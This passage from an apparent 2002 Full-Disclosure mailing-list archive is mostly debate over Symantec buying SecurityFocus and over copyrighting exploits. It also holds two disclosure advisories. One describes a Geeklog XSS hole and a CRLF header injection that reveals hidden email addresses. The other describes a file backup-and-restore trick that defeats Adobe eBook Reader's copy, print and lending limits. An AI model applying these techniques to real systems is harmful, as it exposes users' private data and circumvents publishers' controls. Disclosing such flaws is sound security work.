advisories and proof-of-concept code which stipulates that for-profit > companies may not use said information in any way. That's exactly what needs to happen :) > Let's face it: the for-profit companies have been leeching off the > community for years and giving nothing back save for sponsorship of key > escrow, further draconian legislation, and advocacy of a security cabal > (which they would control) that would take free information and bundle it > as a pay-for product/service. Amen. > Look, I have nothing against someone trying to make a buck. That > is the cornerstone of the capitalist system. What burns my biscuits is > that the monolithic security companies are not making this money off their > own efforts[1], but by leeching off the egalitarian contributions of those > who possess a skill set the businesses are not willing to pay for. Well said! I'm not sure I really have much to say except yes yes yes! peace, core > - -Jay > > 1. About the only real effort I see from corporate security firms these > days is whipping up FUD-filled press releases to scare the living > bejeezus out of the masses about "cyber-terrorism" and other happy > horseshit. > > ( ( _______ > )) )) .--"There's always time for a good cup of coffee"--. >====<--. > C|~~|C|~~| (>------ Jay D. Dyson -- jdyson at treachery.net ------<) | = |-' > `--' `--' `-- I'll be diplomatic...when I run out of ammo. --' `------' > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.7 (TreacherOS) > Comment: See http://www.treachery.net/~jdyson/ for current keys. > > iD8DBQE9NydyGI2IHblM+8ERAnaNAKCAbUUQpAJLuGrkqxlOsflXBJm6dACgkSlH > Y4MHjqIe6qAM28/cSenTBTA= > =9ErK > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From emoyle at scsnet.csc.com Thu Jul 18 22:13:07 2002 From: emoyle at scsnet.csc.com (Ed Moyle) Date: Thu, 18 Jul 2002 17:13:07 -0400 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... Message-ID: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com> On Thursday, July 18, 2002 16:39, Jay D. Dyson [mailto:jdyson at treachery.net] wrote: > Perhaps the best way to beat these cash hounds at their own game > is to start using a strictly not-for-profit licensing on all released > advisories and proof-of-concept code which stipulates that for-profit > companies may not use said information in any way. Allow me to recommend the use of a trivial encryption algorithm to protect exploits and advisories such that any for-profit company must circumvent it in order to use it for their own purposes. Perhaps distribute advisories with the "do not copy" flag set on a .pdf. This would give DMCA protection to the copyright and allow researchers to sue if their "protection measures" are circumvented by companies looking to make money off of the research. -E From nexus at patrol.i-way.co.uk Thu Jul 18 22:25:29 2002 From: nexus at patrol.i-way.co.uk (Nexus) Date: Thu, 18 Jul 2002 22:25:29 +0100 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: Message-ID: <002501c22ea1$a43bccb0$1e01320a@drizzt> ----- Original Message ----- From: "Jay D. Dyson" To: Sent: Thursday, July 18, 2002 9:39 PM Subject: Re: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... [snip] > Indeed. And many of us did see this coming...yet few did anything > about it. Thankfully, VulnWatch and this list exist and may well help > break the inevitable stranglehold that's coming our way. [snip] I'm also wondering what will happen to the pretty extensive vulnerability database et al ? Pay per sploit ? ;-) Cheers, JJ From mxe20 at psu.edu Thu Jul 18 22:58:11 2002 From: mxe20 at psu.edu (Mark Earnest) Date: Thu, 18 Jul 2002 17:58:11 -0400 (EDT) Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Thu, 18 Jul 2002, Ed Moyle wrote: > Allow me to recommend the use of a trivial encryption algorithm to protect > exploits and advisories such that any for-profit company must circumvent > it in order to use it for their own purposes. Perhaps distribute advisories > with the "do not copy" flag set on a .pdf. This would give DMCA protection > to the copyright and allow researchers to sue if their "protection measures" > are circumvented by companies looking to make money off of the research. That sounds good in theory, but in practice any sizable company would devour us, regardless of what the law says. The law is immaterial next to money. - -- Mark Earnest ~~~~~~~~~~~~ Senior Systems Programmer ASET/Emerging Technologies Penn State University Email: mxe20 at psu.edu Office Phone: 814-863-2064 Public Key - http://mearnest.oas.psu.edu/gpgkey.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Made with pgp4pine 1.76 iD8DBQE9Nzn2XIT9wt3I2GMRAkfLAKCk+7MZSbTBqL405BLf8DH1z57BQACeOXWH JlJ+OmrHRuQz1KN84jiF0fE= =LjdH -----END PGP SIGNATURE----- From BlueBoar at thievco.com Thu Jul 18 23:29:30 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 18 Jul 2002 15:29:30 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: Message-ID: <3D37414A.6000509@thievco.com> Jay D. Dyson wrote: > Perhaps the best way to beat these cash hounds at their own game > is to start using a strictly not-for-profit licensing on all released > advisories and proof-of-concept code which stipulates that for-profit > companies may not use said information in any way. Interesting concept. How do you propose to copyright an idea? You can decline to let someone mirror your exploit or advisory verbatim, but there's nothing you can do to keep someone from reporting about a vulnerability. BB From madduck at madduck.net Thu Jul 18 23:49:08 2002 From: madduck at madduck.net (martin f krafft) Date: Fri, 19 Jul 2002 00:49:08 +0200 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com> References: <3BD76687A1CBD74097E37CB67263AE97010278AA@scsetbmail.scsnet.csc.com> Message-ID: <20020718224908.GD3763@fishbowl.madduck.net> also sprach Ed Moyle [2002.07.18.2313 +0200]: > Allow me to recommend the use of a trivial encryption algorithm to protect > exploits and advisories such that any for-profit company must circumvent > it in order to use it for their own purposes. Perhaps distribute advisories > with the "do not copy" flag set on a .pdf. This would give DMCA protection > to the copyright and allow researchers to sue if their "protection measures" > are circumvented by companies looking to make money off of the research. Way Symantec were to use such a document, one that I created in the sweat of my singletude. Do you think I'd have *any* chance on claiming my rights??? -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck 1-800-psych: hello, welcome to the psychiatric hotline. if you have multiple personalities, please press 3, 4, 5 and 6. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020719/b255a9d5/attachment.bin From madduck at madduck.net Thu Jul 18 23:51:27 2002 From: madduck at madduck.net (martin f krafft) Date: Fri, 19 Jul 2002 00:51:27 +0200 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: References: <00fd01c22dd5$2c2436d0$f954b8a1@entrenchtech.com> Message-ID: <20020718225127.GE3763@fishbowl.madduck.net> also sprach Jay D. Dyson [2002.07.18.2239 +0200]: > Indeed. And many of us did see this coming...yet few did anything > about it. Thankfully, VulnWatch and this list exist and may well help > break the inevitable stranglehold that's coming our way. How many people are we by now? > Look, I have nothing against someone trying to make a buck. That > is the cornerstone of the capitalist system. What burns my biscuits is > that the monolithic security companies are not making this money off their > own efforts[1], but by leeching off the egalitarian contributions of those > who possess a skill set the businesses are not willing to pay for. Right on. Let's just stick to this forum and not use Bugtraq anymore. Or make your vulnerabilities available here 2 days before you post to bugtraq (moderation only takes a day). -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck if you don't understand or are scared by any of the above ask your parents or an adult to help you. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020719/8dc081c2/attachment.bin From madduck at madduck.net Thu Jul 18 23:52:23 2002 From: madduck at madduck.net (martin f krafft) Date: Fri, 19 Jul 2002 00:52:23 +0200 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <002501c22ea1$a43bccb0$1e01320a@drizzt> References: <002501c22ea1$a43bccb0$1e01320a@drizzt> Message-ID: <20020718225223.GF3763@fishbowl.madduck.net> also sprach Nexus [2002.07.18.2325 +0200]: > I'm also wondering what will happen to the pretty extensive vulnerability > database et al ? Is there anyone with the capabilities to extract a mirror? (I'd notify webmaster@ before doing so...) I can't provide the bandwidth or server space, unfortunately... -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck you're in college. you've made a mistake. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020719/67764fcf/attachment.bin From Eric.Nelson at viacore.net Fri Jul 19 00:29:35 2002 From: Eric.Nelson at viacore.net (Eric Nelson) Date: Thu, 18 Jul 2002 16:29:35 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... Message-ID: What about publishing and copyrighting the exploit? It's more legal ammo to go after whoever uses it for malicious purposes. Of course this doesn't *stop* the use of the exploit (discourages perhaps?), it just increases the penalties when one gets caught using it. -Eric On Thu, 18 Jul 2002, Blue Boar wrote: > > Perhaps the best way to beat these cash hounds at their own game > > is to start using a strictly not-for-profit licensing on all released > > advisories and proof-of-concept code which stipulates that for-profit > > companies may not use said information in any way. > > Interesting concept. How do you propose to copyright an idea? The idea cannot be copyrighted[1], but the code (which includes the exploit methodology) can be copyrighted with all the cursory terms and conditions for use. > You can decline to let someone mirror your exploit or advisory verbatim, > but there's nothing you can do to keep someone from reporting about a > vulnerability. Sure you can...especially under the auspices of the DMCA. Hell, when you get down to it, all we need is one wild-eyed lawyer[2] on our side who'll toss a flurry of lawsuits and we'll pretty much have the corporate security firms by the short-and-curlies. All kidding aside, I like the notion of encrypting the data and putting stipulations on the decryption. Seems rather like poetic justice to me. Call it the Sklyarov cipher... - -Jay 1. Ideas, names and phrases can be trademarked, however. 2. Maybe one with experience via the Church of Scientology, or the one who brought us McDonald's coffee cups that now read "Allow to cool before applying to genitals"... ( ( _______ )) )) .--"There's always time for a good cup of coffee"--. >====<--. C|~~|C|~~| (>------ Jay D. Dyson -- jdyson at treachery.net ------<) | = |-' `--' `--' `-- I'll be diplomatic...when I run out of ammo. --' `------' -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (TreacherOS) Comment: See http://www.treachery.net/~jdyson/ for current keys. iD8DBQE9N0pAGI2IHblM+8ERAlAnAJ9AbZ/g4I5cPUL3KogHYDjQK5p4VgCeN1pY Q9sVUOYHOhysxYYetRqAzCo= =+6qq -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure From gdd at siliconinc.net Fri Jul 19 00:42:18 2002 From: gdd at siliconinc.net (gdd at siliconinc.net) Date: Thu, 18 Jul 2002 19:42:18 -0400 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <20020718225223.GF3763@fishbowl.madduck.net> References: <002501c22ea1$a43bccb0$1e01320a@drizzt> <20020718225223.GF3763@fishbowl.madduck.net> Message-ID: <20020718194218.A4201@siliconinc.net> On Fri, Jul 19, 2002 at 12:52:23AM +0200, martin f krafft wrote: > Is there anyone with the capabilities to extract a mirror? > (I'd notify webmaster@ before doing so...) A friend of mine already mirrored it. Im not sure as to how well it turned out since I havent had a chance to look at it yet, but it appears that everything is there. A dump of whatever database its in would be a much nicer method of doing this. > I can't provide the bandwidth or server space, unfortunately... I can provide both the bandwidth and server space, but what would the legal issues be with mirroring it? My lawyer wont even offer any advice on this one. Suggestions/advice anyone? gdd at siliconinc.net From BlueBoar at thievco.com Fri Jul 19 01:02:25 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 18 Jul 2002 17:02:25 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: Message-ID: <3D375711.3020903@thievco.com> Jay D. Dyson wrote: > The idea cannot be copyrighted[1], but the code (which includes > the exploit methodology) can be copyrighted with all the cursory terms > and conditions for use. You can't copyright an algorithm, only an implementation. You need a patent to protect an algorithm. Good luck patenting buffer overflows. >>You can decline to let someone mirror your exploit or advisory verbatim, >>but there's nothing you can do to keep someone from reporting about a >>vulnerability. > Sure you can...especially under the auspices of the DMCA. Hell, > when you get down to it, all we need is one wild-eyed lawyer[2] on our > side who'll toss a flurry of lawsuits and we'll pretty much have the > corporate security firms by the short-and-curlies. You think you can stop a news agency from reporting that there is a vulnerability in product X, that works like Y and Z? I think you'll find you're mistaken. I'd love to see it play out, though. > 1. Ideas, names and phrases can be trademarked, however. Not ideas. Names, yes.. but that just means someone has to call their version of the exploit something different. And trademarks are expensive to obtain and defend. > > 2. Maybe one with experience via the Church of Scientology, or the one > who brought us McDonald's coffee cups that now read "Allow to cool > before applying to genitals"... Many people can be intimidated with a lawsuit. Seems like the groups in particular you are concerned about aren't the ones to try threatening with lawyers, though. BB From nick at virus-l.demon.co.uk Fri Jul 19 01:23:10 2002 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 19 Jul 2002 12:23:10 +1200 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others. In-Reply-To: <3D375711.3020903@thievco.com> Message-ID: <0GZG00C4AZQK0C@smtp2.clear.net.nz> Blue Boar replied to Jay D. Dyson: > > The idea cannot be copyrighted[1], but the code (which includes > > the exploit methodology) can be copyrighted with all the cursory terms > > and conditions for use. > > You can't copyright an algorithm, only an implementation. You need a > patent to protect an algorithm. Good luck patenting buffer overflows. > > >>You can decline to let someone mirror your exploit or advisory verbatim, > >>but there's nothing you can do to keep someone from reporting about a > >>vulnerability. > > Sure you can...especially under the auspices of the DMCA. Hell, > > when you get down to it, all we need is one wild-eyed lawyer[2] on our > > side who'll toss a flurry of lawsuits and we'll pretty much have the > > corporate security firms by the short-and-curlies. > > You think you can stop a news agency from reporting that there is a > vulnerability in product X, that works like Y and Z? I think you'll find > you're mistaken. I'd love to see it play out, though. > > > 1. Ideas, names and phrases can be trademarked, however. > > Not ideas. Names, yes.. but that just means someone has to call their > version of the exploit something different. And trademarks are expensive > to obtain and defend. Release exploits with the vaguest of descriptions as to how they work (lost for examples -- just copy'n'paste the "technical bits" of some of the security bulletins from MS...). Have the _only_ PoC code a compiled binary loaded with copyright notices forbidding reversing, etc. Be sure to use some "encryption" (extremely trivial is OK as complexity doesn't matter; can you say XOR?) in the PoC to "protect" the important secret (generally the overflow "string" itself). Be capricious in who you prosecute under the DMCA for incoporating vulnerability detection of this flaw into their products. (Many other "pro-reversing" laws allow reversing if doing so is the only (practical) way to ensure compatibility or system inter-operation -- this should not be a defense against reversing a security vulnerability exploit...) > Many people can be intimidated with a lawsuit. Seems like the groups in > particular you are concerned about aren't the ones to try threatening with > lawyers, though. Do you really care if you win lots of money in such a case, or just that you win? I'm sure you'd find good lawyers who would take such cases on a "no win no fee" basis so long as they got a sizable chunk of ones they did win. They'd only have to win a few before you'd made your point. Of course, IANAL... Regards, Nick FitzGerald From ulfh at update.uu.se Fri Jul 19 01:23:52 2002 From: ulfh at update.uu.se (Ulf Harnhammar) Date: Fri, 19 Jul 2002 02:23:52 +0200 (CEST) Subject: [Full-Disclosure] Geeklog XSS and CRLF Injection Message-ID: Geeklog XSS and CRLF Injection PROGRAM: Geeklog VENDOR: Tony Bibbs et al. HOMEPAGE: http://geeklog.sourceforge.net/ VULNERABLE VERSIONS: 1.3.5sr1, possibly earlier versions as well NOT VULNERABLE VERSIONS: 1.3.5sr2 LOGIN REQUIRED: no SEVERITY: high DESCRIPTION: "Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your own virtual community area, complete with user administration, story posting, messaging, comments, polls, calendar, weblinks, and more! It can run on many different operating systems, and uses PHP4 and MySQL." (direct quote from the program's homepage) Geeklog is published under the terms of the GNU General Public License. SECURITY HOLES: 1) Geeklog has got an XSS hole that affects both the stories and the comments. The program removes the HTML elements that are used for scripting, but it fails to remove the HTML attributes that are used for the same purpose, which leads to this hole. One example of an XSS attack would be: life has made her that much bolder now When a victim moves the mouse pointer over the quote from "Lady Godiva's Operation", an intrinsic event occurs and the JavaScript code is executed. (There is also an XSS issue in the search engine. It was reported by ?ome1, and not by me.) 2) Geeklog has got a CRLF Injection hole in User Profile: Send Email. The users' mail addresses are meant to be secret, but by using this hole, you can get someone's mail address anyway. The problem is that you can add extra mail headers, by using a CRLF combination followed by an extra mail header in the Subject field. One way to add them is saving the HTML document with the form, and changing the tag to a textarea. After opening the edited document in a web browser, you enter a Subject line in the textarea, press Enter, and then you enter your extra mail header. When the mail is sent, that header will be included. If the header in question is "Bcc: ", the message will silently be copied to you, thus revealing the recipient's mail address without them knowing. I have described this type of problem in further detail in my "CRLF Injection" paper, which is available at http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00079.html COMMUNICATION WITH VENDOR: The vendor was contacted on the 1st of July. Version 1.3.5sr2, which does not have any of these security holes (neither mine nor ?ome1's), was released on the 9th of July. RECOMMENDATION: I recommend that all administrators upgrade to version 1.3.5sr2. // Ulf Harnhammar ulfh at update.uu.se From johnc at grok.org.uk Fri Jul 19 01:24:45 2002 From: johnc at grok.org.uk (John Cartwright) Date: Fri, 19 Jul 2002 01:24:45 +0100 Subject: [Full-Disclosure] Copyright Notices Message-ID: <20020719002445.GA23004@www1.grok.org.uk> Hi Some interesting debate about the whole copyright issue going on... We were wondering about appending some kind of statement to posts to back up these points. IANAL, but what do you think of a statement such as this: "The above post and all elements thereof are copyrighted by the poster, and may not be reproduced or used for any commercial purpose without the express permission of the author, unless specified otherwise." Obviously by posting you have to agree that a) Other members might quote what you said in *their* posts. b) It will all end up in the list archives. Alternatively we could spell out the situation in the list charter and point to it in the footer to save room. We'd welcome your comments. - John From smkelly at zombie.org Fri Jul 19 01:38:30 2002 From: smkelly at zombie.org (Sean Kelly) Date: Thu, 18 Jul 2002 19:38:30 -0500 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... In-Reply-To: <3D372B94.5050905@bokeoa.com> References: <3D372B94.5050905@bokeoa.com> Message-ID: <20020719003830.GA34944@edgemaster.zombie.org> On Thu, Jul 18, 2002 at 02:56:52PM -0600, Charles 'core' Stevenson wrote: > Jay, ... > That's exactly what needs to happen :) ... > Amen. ... > Well said! I'm not sure I really have much to say except yes yes yes! I joined this list to see if it would serve any supplemental value to Bugtraq and the other security-related resources out there. So far, all I see is politics and criticism of Symantec and SecurityFocus. Am I mistaken that this list was intended (and spammed/advertised) to be for full disclosure security issues? If I am not mistaken, could such politics related stuff be moved to a different list, as it seems to me that it is politics and commercialism that you are complaining about in the first place. In other words, can't we just move on with it and stay on topic of the list? Or was this list created to allow people to whine about SecurityFocus and Symantec? The answer to my question will assist me in my decision as to whether I should advocate this mailing list or not. Thanks, -- Sean Kelly | PGP KeyID: 77042C7B smkelly at zombie.org | http://www.zombie.org From steve at entrenchtech.com Fri Jul 19 01:45:21 2002 From: steve at entrenchtech.com (Steve) Date: Thu, 18 Jul 2002 18:45:21 -0600 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others. In-Reply-To: <0GZG00C4AZQK0C@smtp2.clear.net.nz> Message-ID: <002001c22ebd$92808cb0$6401a8c0@Laptop2> > Release exploits with the vaguest of descriptions as to how they work > (lost for examples -- just copy'n'paste the "technical bits" of some > of the security bulletins from MS...). Have the _only_ PoC code a > compiled binary loaded with copyright notices forbidding reversing, > etc. Be sure to use some "encryption" (extremely trivial is OK as > complexity doesn't matter; can you say XOR?) in the PoC to "protect" > the important secret (generally the overflow "string" itself). Be > capricious in who you prosecute under the DMCA for incoporating > vulnerability detection of this flaw into their products. (Many > other "pro-reversing" laws allow reversing if doing so is the only > (practical) way to ensure compatibility or system inter-operation -- > this should not be a defense against reversing a security > vulnerability exploit...) But how could you stop one from simply setting up a sniffer to "see" what the exploit does on the network or monitor the local system to see what is done? I am all for people releasing exploit code, I see no reason not to, but trying to protect it is a waste of time as there are a million ways, legal ways, around it. From BlueBoar at thievco.com Fri Jul 19 01:52:50 2002 From: BlueBoar at thievco.com (Blue Boar) Date: Thu, 18 Jul 2002 17:52:50 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others.... References: <3D372B94.5050905@bokeoa.com> <20020719003830.GA34944@edgemaster.zombie.org> Message-ID: <3D3762E2.1080007@thievco.com> Sean Kelly wrote: > I joined this list to see if it would serve any supplemental value to > Bugtraq and the other security-related resources out there. So far, all I > see is politics and criticism of Symantec and SecurityFocus. Am I mistaken > that this list was intended (and spammed/advertised) to be for full > disclosure security issues? If I am not mistaken, could such politics > related stuff be moved to a different list, as it seems to me that it is > politics and commercialism that you are complaining about in the first > place. > > In other words, can't we just move on with it and stay on topic of the > list? Or was this list created to allow people to whine about SecurityFocus > and Symantec? That's what you get with an unmoderated list. People complain about things and send flames. Then they complain about the complaining, and flame people for sending flames. This is the first unmoderated list I've subscribed to in years (out of curiosity.) There's a reason. :) BB From raju at linux-delhi.org Fri Jul 19 02:25:50 2002 From: raju at linux-delhi.org (Raju Mathur) Date: Fri, 19 Jul 2002 06:55:50 +0530 Subject: [Full-Disclosure] List charter Message-ID: <15671.27294.429521.488602@mail.linux-delhi.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Maybe this is the right time for bringing this up. Would the list admins kindly take the time to clarify their position on the potential of this list going commercial at any time? A simple statement like `the archives of this list, subscription to the list and posting privileges to the list shall always remain free for everyone' would do. Preferably PGP-signed. After CDDB, MAPS and ARIS I'm more than a bit concerned about commercialisation of databases created by volunteer contributions. Regards, - -- Raju - -- Raju Mathur raju at kandalaya.org http://kandalaya.org/ It is the mind that moves -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.6 and Gnu Privacy Guard iEYEARECAAYFAj03ao4ACgkQyWjQ78xo0X8oewCfQXbqH5ltFlCA83zMqUkdD04B 5WoAmwRxhPaN5PvL5uyDDH9QHBvS6h7F =MUBu -----END PGP SIGNATURE----- From len at netsys.com Fri Jul 19 02:30:47 2002 From: len at netsys.com (Len Rose) Date: Thu, 18 Jul 2002 21:30:47 -0400 Subject: [Full-Disclosure] maintenance Message-ID: <20020718213047.J14259@netsys.com> We're about to perform some maintenance to the mail server, and will be offline for about an hour. Len From hggdh at attbi.com Fri Jul 19 03:52:22 2002 From: hggdh at attbi.com (HggdH) Date: Thu, 18 Jul 2002 20:52:22 -0600 Subject: [Full-Disclosure] Copyright Notices References: <20020719002445.GA23004@www1.grok.org.uk> Message-ID: <005a01c22ecf$4ee650e0$3264a8c0@local> Might be a good idea, given what is going on. I am unsure on the restriction, anyway "(...may not...used for any commercial...). It is obvious all vendors follow BUGTRAQ, vul-watch, etc -- it would be stupid not to. If I am a vendor, and someone posts a vulnerability on my product together with such a restriction, this would put me in a dilema: if I do not use it, I maintain my product vulnerable; if I use it, I will have to pay someone to **allow me to correct my product**. This sounds even more wrong than Symantec buying BUGTRAQ. ..hggdh.. ----- Original Message ----- From: "John Cartwright" To: Cc: Sent: Thursday, July 18, 2002 18:24 Subject: [Full-Disclosure] Copyright Notices Hi Some interesting debate about the whole copyright issue going on... We were wondering about appending some kind of statement to posts to back up these points. IANAL, but what do you think of a statement such as this: "The above post and all elements thereof are copyrighted by the poster, and may not be reproduced or used for any commercial purpose without the express permission of the author, unless specified otherwise." Obviously by posting you have to agree that a) Other members might quote what you said in *their* posts. b) It will all end up in the list archives. Alternatively we could spell out the situation in the list charter and point to it in the footer to save room. We'd welcome your comments. - John _______________________________________________ Full-Disclosure - We believe in it. Full-Disclosure at lists.netsys.com http://lists.netsys.com/mailman/listinfo/full-disclosure From full-disclosure at ifokr.org Fri Jul 19 03:57:18 2002 From: full-disclosure at ifokr.org (Brian Hatch) Date: Thu, 18 Jul 2002 19:57:18 -0700 Subject: [Full-Disclosure] Symantec Buys SecurityFocus, among others. In-Reply-To: <0GZG00C4AZQK0C@smtp2.clear.net.nz> References: <3D375711.3020903@thievco.com> <0GZG00C4AZQK0C@smtp2.clear.net.nz> Message-ID: <20020719025718.GC3913@ifokr.org> > Release exploits with the vaguest of descriptions as to how they work > (lost for examples -- just copy'n'paste the "technical bits" of some > of the security bulletins from MS...). Have the _only_ PoC code a > compiled binary loaded with copyright notices forbidding reversing, > etc. Be sure to use some "encryption" (extremely trivial is OK as > complexity doesn't matter; can you say XOR?) in the PoC to "protect" > the important secret (generally the overflow "string" itself). Be > capricious in who you prosecute under the DMCA for incoporating > vulnerability detection of this flaw into their products. (Many > other "pro-reversing" laws allow reversing if doing so is the only > (practical) way to ensure compatibility or system inter-operation -- > this should not be a defense against reversing a security > vulnerability exploit...) This and other 'Protect your code with the DMCA' ideas are interesting. So we lock down our exploits with crappy encryption, hope someone uses them, and sue. Hopefully we win, and we get a nice check. And the DMCA has just been upheld in court. We establish case law that indicates the DMCA is valid law, that it's even supported by Open Source / Full Disclosure advocates. Next time another Dimitry gets slapped with it, what are we going to fall back on? Although amusing to use the 'tools of the enemy', by using them successfully you strengthen how they can be used against you. I think this is a bad idea... -- Brian Hatch Friends help you move. Systems and Real friends help Security Engineer you move bodies. www.buildinglinuxvpns.net Every message PGP signed -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020718/75acb4aa/attachment.bin From len at netsys.com Fri Jul 19 06:52:37 2002 From: len at netsys.com (Len Rose) Date: Fri, 19 Jul 2002 01:52:37 -0400 Subject: [Full-Disclosure] List charter In-Reply-To: <15671.27294.429521.488602@mail.linux-delhi.org>; from raju@linux-delhi.org on Fri, Jul 19, 2002 at 06:55:50AM +0530 References: <15671.27294.429521.488602@mail.linux-delhi.org> Message-ID: <20020719015237.A14267@netsys.com> Hi.. This is as close to an official statement as I can get. We will not make commercial use of this list, or from the contents of this list. We will not promote our services, or misuse this list to further ourselves or any other entity. We will all profit by the knowledge, and intelligence we gather to be used in our research, our jobs, and on our systems and networks. We don't want to repeat the same mistakes, and hopefully with everyone's help, we won't. Raju Mathur wrote: > Maybe this is the right time for bringing this up. > > Would the list admins kindly take the time to clarify their position on > the potential of this list going commercial at any time? A simple > statement like `the archives of this list, subscription to the list > and posting privileges to the list shall always remain free for > everyone' would do. Preferably PGP-signed. > > After CDDB, MAPS and ARIS I'm more than a bit concerned about > commercialisation of databases created by volunteer contributions. > > Regards, > > - -- Raju > - -- -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 185 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020719/74e98ff4/attachment.bin From vkatalov at elcomsoft.com Fri Jul 19 12:29:50 2002 From: vkatalov at elcomsoft.com (vkatalov at elcomsoft.com) Date: Fri, 19 Jul 2002 15:29:50 +0400 Subject: [Full-Disclosure] Vulnerability found: Adobe Acrobat eBook Reader and Content Server Message-ID: <12011592375.20020719152950@elcomsoft.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: MD5 Product Vulnerability Reporting Form CONTACT INFORMATION =============================================================================== Name : Vladimir Katalov E-mail : info at elcomsoft.com Phone / fax : +7 095 216-7937 +1 866 448-2703 (fax; US, toll-free) Affiliation and address: 2-171 generala Antonova st. Moscow 117279 Russia Have you reported this to the vendor? Yes (the vendor has not replied). TECHNICAL INFO =============================================================================== Details on the vulnerability - ---------------------------- An eBook (electronic book) is simply a file that contains text and images - as in usual (printed) book, but with additional features such as hyperlinks (cross-references), searching capabilities and sometimes sounds/music. To read an eBook, you should have a PC with an appropriate software, or a special hardware device. Adobe Content Server (http://www.adobe.com/products/contentserver/) makes it easy for you to sell electronic books (eBooks) securely online. Adobe Content Server packages and protects eBooks and distributes them in PDF format directly from any Web site. Anyone with the free Adobe Acrobat eBook Reader (http://www.adobe.com/products/ebookreader/) can purchase your content with ease. That technology allows to enable or disable the following consumer permissions: copy text to clipboard, print all or a defined number of pages, lending, expiration, and text to speech. When the file is encrypted, special master voucher for its distribution is being created. The master voucher is a separate, XML-based file that contains an encrypted key to the eBook and the set of privileges that accompany it. When a customer purchases an Adobe PDF eBook directly from an e-commerce site, it's automatically downloaded into the customer's personal Acrobat eBook Reader library for immediate viewing. Acrobat eBook Reader unlocks the encrypted key that came with the eBook and its master voucher. Now the eBook is tied to the customer's Acrobat eBook Reader and can't be transmitted elsewhere unless lending or gifting permission has been enabled. The voucher also contains permissions (given by the publisher) for all the books: whether or not you can print and copy portions of a book; the publisher may allow you to print only a limited number of pages or to copy a limited number of selections in a given time period. The Acrobat eBook Reader keeps track of your printing and copying. When you print or copy, a dialog box tells you how much printing or copying you have done and asks whether you want to proceed. In addition, if the publisher allows, you can give or lend the book to someone else. 1. Copy/print: if printing and/or copying is allowed, but limited (the typical limitation is: you can print 10 pages in 10 days, or copy 10 portions of the text to the Clipboard in 10 days), these limitations can be defeated. Just create backup copies of the following files from Adobe Acrobat eBook Reader folder: Data\Vouchers\*.* Data\GB.dbd Data\Category.etb Data\Library*.etb Data\Library*.vld After copying or printing in Adobe Acrobat eBook Reader, just restore these files from backup, and copy/print limitations will be back to the status as if you have not copied or printed anything at all. 2. Lend/give: if these operations are allowed by the publisher, you can backup the above mentioned files, perform Lend/Give, and restore the files. The book(s) will remain in your lirbary, while the recipient (you gave the book to) will also have a copy. The impact of this vulnerability - -------------------------------- With [1], the owner of the book can copy/print unlimited number of portions of the book, ignoring the limitations set by the publisher. With [2], it is possible to create multiple copies (as many as you want) of any book (the 'Give' function is enabled for): make the backup; give it to someone else through network or IR port; restore from backup; give to the next recipient etc. Systems and/or configurations that are vulnerable - ------------------------------------------------- All versions of Adobe Content Server, and at least Windows version of Adobe Acrobat eBook Reader. Workarounds and/or fixes for this vulnerability - ----------------------------------------------- Not available. Though it is not very hard to implement a workaround by 